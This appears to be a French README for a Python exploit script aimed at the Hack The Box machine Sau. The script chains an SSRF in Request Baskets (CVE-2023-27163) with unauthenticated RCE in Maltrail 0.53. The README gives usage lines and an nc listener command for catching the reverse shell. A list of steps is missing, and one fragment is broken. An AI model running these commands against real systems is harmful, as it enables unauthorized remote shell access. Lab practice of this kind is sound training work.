
Chaîne d'exploitation automatisée pour HTB Sau — CVE-2023-27163 (SSRF) + Maltrail RCE non authentifié → Shell inversée
Un script d'exploitation Python qui enchaîne CVE-2023-27163 (Falsification de requête côté serveur dans Request Baskets ≤ 1.2.1) avec une vulnérabilité d'exécution de code à distance non authentifiée dans Maltrail 0.53, délivrant un shell inversé. Conçu pour la machine Hack The Box Sau.
Ce script automatise le chemin d'exploitation nécessaire pour obtenir un accès initial sur la cible en :
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
Exemple :
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Avant d'exécuter l'exploit, démarrez un écouteur sur votre machine pour capturer le shell inversé :
nc -lvnp <LISTENER_PORT>
Exemple :
nc -lvnp 4444
| Paramètre | Description |
|---|---|
TARGET_URL | Base URL de la cible (par ex., http://IP) |
LISTENER_IP | IP de votre machine d'attaque |
LISTENER_PORT | Port pour recevoir le shell inversé |
bucket_url)/ final de l'URL cible (géré automatiquement dans le script)Ce projet est destiné à des fins éducatives et à une utilisation dans des environnements autorisés tels que Hack The Box. Ne l'utilisez pas contre des systèmes sans autorisation appropriée.